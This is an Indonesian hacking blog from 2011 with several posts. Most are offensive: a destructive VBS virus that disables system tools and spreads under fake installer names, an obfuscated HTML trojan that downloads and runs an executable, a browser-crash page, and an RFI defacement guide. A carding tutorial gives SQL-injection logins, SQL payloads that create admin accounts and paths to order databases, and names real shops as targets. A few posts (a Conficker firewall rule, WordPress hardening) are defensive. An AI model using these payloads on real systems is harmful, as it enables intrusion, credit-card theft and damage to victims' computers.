Kamis, 22 September 2011

0 Dork Credit Card

20.45 Under From 0x13
[0 Comment]
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id=
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?catalogid=
shopdisplayproducts.cfn?catalogid=
displayproducts.cfm?category_id=
displayproducts.asp?category_id=
DisplayProducts.asp?prodcat=
DisplayProducts.cfm?prodcat=x
productDetail.cfm?ProductID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp?CatId=
Store_ViewProducts.asp?Cat=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productID=
ProductDetails.asp?prdId=12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?product_id=
products.php?subcat_id=
product.php?product_id=
view_product.cfm?productID=
product_details.asp?prodid=
shopdisplayproducts.cfm?id=
displayproducts.cfm?id=
Read More »

0 SCRIPT VIRUS SETAN.VBS

20.45 Under From 0x13
[0 Comment]
On error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject (“Wscript.Shell”)
set FSO = CreateObject (“Scripting.FileSystemObject”)
set Creator = FSO.CreateTextFile (“C:\sulawesi.vbs”, true)
Creator.WriteLine (“Msgbox (“& Chr (34) & “Salam Kenal dari Saya, zer03s :<” & chr (34)& “)”)
Creator.Close
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoRun”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOption”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,”16″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NoSetTaskbar”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\HideFileExt”,”1″,”REG_DWORD”
Regpen.Regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “I’M SETAN”
Regpen.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”ASSALAMUALAIKUM, YA AHLIL KUBUR”
Set Copier = FSO.GetFile (“C:\zer03s.vbs”)
Copier.Copy (“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe.vbs”)
FSO.CreateFolder (“C:\Program Files\Microsoft 0fficeffice12″)
FSO.CreateFolder (“D:\Program”)
FSO.CreateFolder (“E:\Program”)
FSO.CreateFolder (“F:\Program”)
FSO.CreateFolder (“G:\Program”)
FSO.CreateFolder (“H:\Program”)
FSO.CreateFolder (“I:\Program”)
FSO.CreateFolder (“J:\Program”)
FSO.CreateFolder (“K:\Program”)
Set Deleter = FSO.GetFile (“C:\Windows\System32\Restore\rstrui.exe”)
Deleter.Move (“C:\Program Files\Microsoft 0fficeffice12\rstrui.Gnamu”)
set Dupler = FSO.GetFile (WScript.ScriptFullName)
Dupler.Copy (“C:\Program Files\Microsof 0fficeffice12\Hantu.vbs”)
Dupler.Copy (“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Desktop.ini.vbs”)
Dupler.Copy (“C:\Documents and Settings\All Users\Desktop\Dajjal_Antivirus.exe.vbs”)
Dupler.Copy (“C:\Windows\System32\Restore\rstrui.exe.vbs”)
Dupler.Copy (“D:\Program\MotoGP_SETUP.vbs”)
Dupler.Copy (“E:\Program\TuneUp2009_SETUP.vbs”)
Dupler.Copy (“F:\Program\Ansav_SETUP.vbs”)
Dupler.Copy (“G:\Program\DeltaForce_SETUP.vbs”)
Dupler.Copy (“H:\Program\DeltaForce_SETUP.vbs”)
Dupler.Copy (“I:\Program\Ansav_SETUP.vbs”)
Dupler.Copy (“J:\Program\Project.vbs”)
Dupler.Copy (“K:\Program\Hantu.vbs”)
Set Runner = WScript.CreateObject (“WScript.Shell”)
Runner.Run (“C:\Program Files\Microsoft 0fficeffice12\Hantu.vbs”)
simpan dengan extensi.vbs
Read More »

0 VoIP Network Scanning

20.44 Under From 0x13
[0 Comment]
aringan VoIP pemindaian …??? hhhmmmm … hanya untuk memastikan keberadaan jaringan VoIP di …;)
Lingkungan VoIP server tidak hanya telepon dan VoIP dan jasa tetapi juga ada perangkat lain seperti router dan gateway VPN, server web, server TFTP, server DNS, server DHCP, server RADIUS, firewall, sistem pencegahan penyusupan, dan pengontrol sesi perbatasan.
Host discovery:
[root@zer03s]# nmap -sP 192.168.1.1-254
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2010-07-19 20:51 CST
Host 192.168.1.1 appears to be up.
MAC Address: 00:13:10:D4:AF:44 (Cisco-Linksys)
Host 192.168.1.21 appears to be up.
MAC Address: 00:0F:34:11:80:45 (Cisco Systems)
Host 192.168.1.23 appears to be up.
MAC Address: 00:15:62:86:BA:3E (Cisco Systems)
Host 192.168.1.24 appears to be up.
MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology)
Host 192.168.1.25 appears to be up.
MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks)
Host 192.168.1.27 appears to be up.
MAC Address: 00:04:F2:03:15:46 (Polycom)
Host 192.168.1.51 appears to be up.
MAC Address: 00:04:13:23:34:95 (Snom Technology AG)
Host 192.168.1.52 appears to be up.
MAC Address: 00:15:62:EA:69:E8 (Cisco Systems)
Host 192.168.1.53 appears to be up.
MAC Address: 00:04:0D:50:40:B0 (Avaya)
Host 192.168.1.54 appears to be up.
MAC Address: 00:0E:08:DA:24:AE (Sipura Technology)
Host 192.168.1.55 appears to be up.
MAC Address: 00:E0:11:03:03:97 (Uniden SAN Diego R&D Center)
Host 192.168.1.56 appears to be up.
MAC Address: 00:0D:61:0B:EA:36 (Giga-Byte Technology Co.)
Host 192.168.1.57 appears to be up.
MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics)
Host 192.168.1.103 appears to be up.
MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.)
Host 192.168.1.104 appears to be up.
Nmap finished: 254 IP addresses (17 hosts up) scanned in 5.329 seconds
[root@attacker]# nmap -P0 -PT80 192.168.1.23
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-02-19 21:28 CST
Interesting ports on 192.168.1.23:
(The 1671 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:15:62:86:BA:3E (Cisco Systems)
Nmap finished: 1 IP address (1 host up) scanned 2.144 second
good luck… happy VoIP hacking friends….
Read More »

1 PRO XL gratis internetan (hp)

20.43 Under From 0x13
[1 Comment]
Harus REG dulu KAPAN LAGI dgn cara ketik *123*5*6*8#
tunggu smpai ada blsan dr operator,tp emang kena Rp 1000 dan untuk UNREG *123*5*6*8*4*3#
Nb:USAHAN PULSA MINIM BIAR GA MALAK,
Rubah seting di hp dgn :
apn:www.xlspeed.net
user dan pass : xlspeed ip proxy : 80.239.242.113
port 80 seting opmin http server : http://xlgo.co.id:80/
socket : standarhost : 80.239.242.113 remove port d centang f
q bq mq :kosong
sudah di coba gan,,hasilnya memuaskan….
Read More »

0 JavaScript Password Protection

20.42 Under From 0x13
[0 Comment]
Contoh halaman protect password >>> DISINI
Scriptnya gan…
<HEAD>
<SCRIPT language="JavaScript">
<!--hide

var password;

var pass1="cool";

password=prompt('Please enter your password to view this page!',' ');

if (password==pass1)
  alert('Password Correct! Click OK to enter!');
else
   {
    window.location="http://www.pageresource.com/jscript/jpass.htm";
    }

//-->
</SCRIPT>
</HEAD>
Read More »

0 Contoh bugs pada system web shoping

20.41 Under From 0x13
[0 Comment]
Contoh bugs pada bentuk toko system : shopadmin
Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log
Contoh bugs pada bentuk toko sistem : metacart
Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb
Contoh bugs pada bentuk toko sistem CShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : PDshopro
Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : commerceSQL
Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log
Contoh bugs pada bentuk toko sistem : Cart32 v3.5a
Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25 –
Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://Target/vpasp/shopadmin.asp
Contoh bugs pada bentuk toko sistem : Lobby.asp
Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb
Contoh bugs pada bentuk toko sistem : Shopper.cgi
Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log
Contoh bugs pada bentuk toko sistem :P roddetail.asp
Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem igishop
Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
setelah bisa login, cari data yang diperlukan .
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca
Contoh bugs pada bentuk toko sistem : Index Cart
Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin
Contoh bugs pada bentuk toko sistem : Index cart
Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??
Contoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..
Contoh bugs pada bentuk toko sistem : Sunshop
Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
Contoh bugs pada bentuk toko sistem : digishop
Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment.
Read More »

0 anti IDManager

20.40 Under From 0x13
[0 Comment]
Banyak yg make IDM di warnet kalian? kesel karena client complain masalah koneksi yg “sangat tidak enak” ? mau negor yg make tapi malu / ga tau siapa yg make? ato mau nglarang user make IDM tapi takut di bilang “PELIT” ??
pake ini saja.
;——————————— CODE START ————————————;
;~ ANTI-IDM v0.1
;~ Coder : zer03s [Coder @zer03s]
];~ YM: hack_fzy
Opt(“TrayIconHide”, 1)
FileCopy(@autoitexe,”C:\Windows\AntiIDM.exe”)
RegWrite(“HKLM\Software\Microsoft\Windows\Current Version\Run”,”Anti-IDM”,”REG_SZ”,”C:\Windows\AntiIDM.exe”)
While (1)
For $i=0 to 100 step 1
if ProcessExists(“IDMAN.exe”) then
sleep(60000)
processclose(“idman.exe”)
EndIf
Next
wend
;——————- END of CODE —————————-;
how to use?
Download Autoit Compiler from www.autoitscript.com
open autoit default editor, I’d like to use Notepad++
copy code above, save as *.au3, open Aut2exe.exe from autoit Program groups in start menu.
complie this script. then run it from your client. Enjoy .!!!
Read More »

0 Trojan Html

20.20 Under From 0x13
[0 Comment]
<script language=”VBScript” type=”text/javascript”>
on error resume next
dl = “www.site.com/trojan.exe”
Set df = ********.createElement(“o bject”)
cls1=”clsid:BD96″
cls2=”C556-65A”
cls3=”3-11D0-9″
cls4=”83A-00C04FC29E36″
clsfull=cls1&cls2&cls3&cl s4
df.setAttribute “classid”,clsfull
strr1=”Mic”
strr2=”roso”
strr3=”ft.”
strr4=”XML”
strr5=”HTTP”
strr=strr1&strr2&strr3&st rr4&strr5
Set x = df.CreateObject(strr,”")
ab1=”A”
ab2=”dod”
ab3=”b.S”
ab4=”t”
ab5=”re”
ab6=”am”
strb1=ab1&ab2&ab3&ab4&ab5 &ab6
strb5=strb1
set YY = df.createobject(strb5,”")
YY.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fnamezz1=”update.exe”
scripp1=”Scrip”
scripp2=”ting”
scripp3=”.Fil”
scripp4=”eSyste”
scripp5=”mObject”
scripp=scripp1&scripp2&sc ripp3&scripp4&scripp5
set FF = df.createobject(scripp,”" )
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1 )
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject(“Shell.Ap plication”,”")
MM.ShellExecute fnamezz1,”",”",”open”,0
</ s c r i p t >
</BODY>
</HTML></body></html></script>
Read More »

0 browser crash in script

20.20 Under From 0x13
[0 Comment]
Assalamualaikum….
mungkin teman-teman skalian ada yang pernah dapat link jail, yang bikin kita klik klik terus ikutin peritahnya yang ga habis-habis…
dan akhirnya jalan keluar hanya Ctrl+Alt+Del trus men End Task mozilla atw browser lain…    itu adalah javascript yg di buat berulang-ulang dengan pertanyaan yg aneh” yang sengaja di buat untuk jail di dunia maya,, tapi browser-browser sekarang sudah mengupdate keamanannya sehingga kalau kita membuka link-link javascript jail browser akan minta konfirmasi dan peringatan kepada user. jadi javascript jail skrng sudah tidak ampuh lagi. nah kali ini saya punya cara baru untuk jail/iseng di dunia maya dengan membuat browser kita jadi crash atau (not responding)…      (kalo lagi asik-asik browsing terus tiba-tiba browser kita crash betapa menyebalkan bukan? )
caranya gampang…
copas script dibawah ini ke notepad
# ======== HTML (1) =======>
<html>
<head>
<body onload="javascript:KeD();">
<script language="JavaScript">
      function KeD()
       {
    var buffer = '\x42';
        for(i=0; i <= 999 ; ++i)
        buffer+=buffer+
    window.open(buffer+buffer+buffer,width=-999999999999999,height=-9999999999999999); // Open New Windows & Crash !!
       }
</script>
</head>
</body>
</html>
# ======== HTML (2) =======>
<html>
<head>
<body onload="javascript:AnS();">
<script language="JavaScript">
      function AnS()
       {
    var buffer = '\x42';
        for(i=0; i <= 999 ; ++i)
        buffer+=buffer+
    window.open(buffer+buffer+buffer,fullscreen=true); // Open New Windows & Crash !!
       }
</script>
</head>
</body>
</html>
lalu save dengan nama (terserah) ekstensi .html
sekarang kita tinggal mencari hostingan gratis (cari aja di gugel) atau bisa juga diupload di web yg sudah di eksploitasi.
setelah file .html nya sudah diupload,,coba buka link file .html yang diupload tadi….   browser anda tiba-tiba crash.  script diatas saya test di firefox 3.6 work…  diatas v3.6 udh ga work lagi….
tapi tenang saja berikut link donglot file crash 1,2,3
http://www.2shared.com/file/r5B23eQn/Crash.html
http://www.2shared.com/file/-3TDw5tv/Crash2.html
http://www.2shared.com/file/_IbkrcpK/Crash3.html
berikut kemampuan script tersebut…
Read More »

0 Deface Web simple Via RFI

20.17 Under From 0x13
[0 Comment]
Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
  • cd namadirectory = Melihat Suatu directory
  • ls -al = Melihat Suatu Directory Lebih Dalam lagi
  • find = Mengecek Directory directory
  • cat = Membaca Suatu Berkas
  • wget = MengUpload suatu Files
  • tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
  • pwd = Mengetahui Di Directory mana Kita Berada
  • uname -a = Keberadaan Path berada
  • w = Mengetahui Siapa Saja yang telah menggunakan Shell.
  • curl = mendownload url
  • [EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Site Oneadmin RFI
atau cari RFI di exploit db atau web penyedia exploit lain.
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya …
http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya …
http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka…
nah sekarang saya kasi contoh pathnya …
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : …
http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
nah sekarang tinggal upload file html/php defacesan kita ke direktoryinya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Lumayan banyak kan ? Nah selamat mencoba
Read More »

0 block virus confiker di mikrotik

20.15 Under From 0x13
[0 Comment]
Untuk blok virus conficker melalui mikrotik dapat menggunakan script berikut ini. Buka Terminal di mikrotik terllebih dahulu. Lalu copy script di bawah ini.

/ip firewall mangle

add chain=prerouting protocol=udp dst-port=445 action=mark-connection new-connection-mark=conn-conficker comment=”445-UDP” disabled=no passthrough=yes

add chain=prerouting protocol=tcp dst-port=445 action=mark-connection new-connection-mark=conn-conficker comment=”445-TCP” disabled=no passthrough=yes

add chain=prerouting protocol=tcp dst-port= 135,137,138,139 action=mark-connection new-connection-mark=conn-conficker comment=”135,137,138,139-TCP” disabled=no passthrough=yes

add chain=prerouting protocol=udp dst-port=135,137,138,139 action=mark-connection new-connection-mark=conn-conficker comment=”135,137,138,139-UDP” disabled=no passthrough=yes

add chain=prerouting connection-mark=conn-conficker action=mark-packet new-packet-mark=conficker-pkt passthrough=no comment=”conficker-pkt” disabled=no

/ip firewall filter

add chain=forward packet-mark=conficker-pkt action=drop comment=”drop conficker” disabled=no
Read More »

0 celah bug / keamanan di wordpress

20.13 Under From 0x13
[0 Comment]
Salah satu celah keamanan lain dari WordPress yaitu terletak pada direktori wp-content/themes/nama-themes. Misalnya pada URLseperti ini:
http://namadomainsitus/wp-content/themes/nama-theme
Dengan menggunakan pola URL seperti itu, struktur direktori kontrol panel hosting yang digunakan oleh sebuah situs WordPress bisa terlihat. Ini bisa membuka celah untuk dieksploitasi lebih lanjut. Namun yang paling rawan yaitu terlihatnya username akun hosting dari domain situs yang dites menggunakan pola URL tersebut.
Memang sih, tak terlalu beresiko jika password-nya tidak diketahui atau sulit ditembus oleh pihak yang kurang bertanggung jawab. Selama password akun hosting tidak bocor atau tidak tertebak, maka walaupun username sudah diketahui, bisa saya katakan masih aman (dari ancaman hacking atau cracking).
Walaupun demikian, tentunya tidak ada salahnya kita sebagai admin situs (yang menggunakan CMS WordPress) berusaha meningkatkan level keamanan situs kita menjadi 1 level lebih tinggi.
Dengan menutup/mengamankan salah satu celah ini, tentunya situs kita akan relatif lebih sulit untuk ditembus. Username akun hosting kita jadi tidak mudah terlihat (lewat metode eksploitasi via URL).
Sebelum saya lanjut ke cara pencegahan, mari kita lihat dulu salah satu contoh tampilan celah keamanan WordPress yang cukup rawan.
Ilustrasi di atas hanyalah situs fiktif. Jadi, bukan berarti saya sengaja menelanjangi keamanan sebuah situs yang telah ada. Boleh Anda tes sendiri kalau tidak percaya tentang fiktifnya domain situs wongkampret.com :) Setidaknya hingga tulisan ini saya publish, belum ada yang menggunakan domain tersebut.
Dari pesan error yang muncul dalam gambar/contoh di atas, username akun hostingnya jelas terlihat, yaitu ‘wongkampret’. Sebenarnya tanpa eksploitasi begini pun bisa dengan mudah ditebak. Namun namanya juga contoh. Bisa saja username yang digunakan bukan berupa nama situsnya.
Celah keamanan seperti di atas cukup sering saya temukan. Misalnya pada beberapa blog WordPress teman-teman blogger (terutama yang menggunakan cPanel sebagai kontrol panel hostingnya). Bahkan pada salah satu blog milik seorang pakar WordPress ternama Indonesia. Pola pesan error yang muncul via URL di atas biasanya sama, yaitu berupa:
Fatal error: Call to undefined function get_header() in /home/username-hosting/public_html/wp-content/themes/nama-theme/index.php on line bla..bla..bla

Cara menutupi celah keamanan direktori wp-content/themes/namatheme

  1. Login ke kontrol panel hosting Anda.
  2. Buka file index.php pada direktori theme yang Anda gunakan pada situs/blog Anda. Misalnya: wp-content > themes > namatheme > index.php
  3. Tambahkan kode PHP berupa:
    <?php error_reporting(0);?>
    Tepatnya di atas atau sebelum kode <?php get_header(); ?>
    Lihat saja contoh berikut agar lebih jelas.

  1. Seperti keterangan pada gambar di atas, kode yang kita tambahkan gunanya yaitu untuk menghilangkan pesan error ketika ada orang jahil ingin mengekploitasi keamanan situs WordPress kita lewat pola URL namadomain/wp-content/themes/namatheme
  2. Silakan klik tombol ‘simpan/save’ usai Anda menambahkan sebaris kode PHP di atas. Lalu coba tes kembali hasilnya dengan mengetikkan :
    http://namadomainsitusanda/wp-content/themes/namathemeyangandagunakan
Jika berhasil, pesan error akan hilang dan hanya muncul halaman kosong. Namun penambahan kode penghilang pesan error ini bisa mengakibatkan kita tidak mengetahui di mana letak error ketika kita salah mengedit script theme. Kemungkinan cuma muncul halaman kosong/blank pada lokasi halaman yang telah kita edit. Misalnya pada halaman index. Bisa juga muncul isinya, namun tanpa keterangan error apa pun.
Jika menemukan kondisi seperti itu, ada baiknya Anda hapus sebentar baris kode penghilang pesan errornya. Setelah letak errornya Anda ketahui & bisa Anda hilangkan, silakan tambahkan kembali kode penghilang pesan error tersebut. Beres deh masalahnya
Selamat mencoba dan mohon koreksi jika ada yang keliru dari penjelasan saya di atas.
Read More »

0 scan keylogger lewat mikrotik

20.12 Under From 0x13
[0 Comment]
Mungkin analisa ane seh biasa pake keylogger dan sejenisnya, pertama mungkin kita bisa menggunakan scan dengan anti virus, Kaspersky atau yang lainnya, atau pake anti keylogger juga bisa, bisa dicari2 di Google, bisa juga pake deepfreeze tapi bisa juga di undepfreeze, kalo keyloggernya rada nakal kita bisa blok keylogger tadi di network kita.

Akhirnya saya inisiatif blok lewat port, kebetulan jaringan di warnet ini memakai mikrotik. Langsng saja, jadi judulnye berubah blok keylogger di jaringan mikrotik.

Keylogger biasanya report akun2 kepada si "bos"nya menggunakan beberapa port,

1. FTP
2. EMAIL

Port FTP berada di angka 21

Sementara port yang digunakan untuk layanan email berada pada port :
1. 25
2. 995
3. 465
4. 587
5. 110
6. dll

Mari kita block port-port tersebut di mikrotik, ini cara yang menurut saya bagus untuk owner warnet atau operator warnet, karena kebanyakan keylogger menggunakan metode penyimpanan log 3 metode:

1. FTP
2. EMAIL

